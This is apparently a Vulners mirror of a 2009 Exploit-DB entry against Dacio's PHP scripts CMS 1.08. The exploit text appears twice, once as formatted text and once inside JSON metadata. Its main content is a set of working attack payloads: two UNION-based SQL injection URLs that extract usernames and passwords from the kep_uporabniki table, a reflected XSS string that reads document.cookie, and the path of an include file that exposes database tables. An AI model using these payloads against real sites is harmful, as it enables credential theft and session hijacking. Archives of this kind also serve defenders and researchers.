Search...

dacio's CMS 1.08 xss/sql/dd Multiple Vulnerabilities

2009-02-11T00:00:00

ID EDB-ID:8042
Type exploitdb
Reporter Mehmet Ince
Modified 2009-02-11T00:00:00

Description

dacio's CMS 1.08 (xss/sql/dd) Multiple Vulnerabilities. Webapps exploit for php platform

                                        
                                            =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=               Dacio's PHP scripts CMS v1.08 Remote SQL Injection Vuln.      
=             
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   Dacio's PHP scripts CMS, version 1.08
= Price:      $Free
=
= Author: xoron
=
= Tesekkurler unutmayan VolqaN!
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS   
=
=  Sql Injections:
=      /?Kat=-1/**/union/**/select/**/username/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
=      /?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
=     
=
=  XSS Vuln:
=      /index.php?search_string="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
=
=  MySQL Tables:
=      /include/funkcije.inc
=                                      
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2009-02-11]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:8042", "hash": "9f2582f1ca74e292556bc976aaafa108", "type": "exploitdb", "bulletinFamily": "exploit", "title": "dacio's CMS 1.08 xss/sql/dd Multiple Vulnerabilities", "description": "dacio's CMS 1.08 (xss/sql/dd) Multiple Vulnerabilities. Webapps exploit for php platform", "published": "2009-02-11T00:00:00", "modified": "2009-02-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/8042/", "reporter": "Mehmet Ince", "references": [], "cvelist": [], "lastseen": "2016-02-01T04:37:30", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-01T04:37:30"}, "dependencies": {"references": [], "modified": "2016-02-01T04:37:30"}, "vulnersScore": 0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8042/", "sourceData": "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n=\n= XORON 2009(C)\n=\n= Dacio's PHP scripts CMS v1.08 Remote SQL Injection Vuln. \n= \n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n=\n= Script: Dacio's PHP scripts CMS, version 1.08\n= Price: $Free\n=\n= Author: xoron\n=\n= Tesekkurler unutmayan VolqaN!\n=\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n=\n= BUGS \n=\n= Sql Injections:\n= /?Kat=-1/**/union/**/select/**/username/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*\n= /?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*\n= \n=\n= XSS Vuln:\n= /index.php?search_string=\"><script>alert(document.cookie)</script>\n=\n= MySQL Tables:\n= /include/funkcije.inc\n= \n=\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n# milw0rm.com [2009-02-11]\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}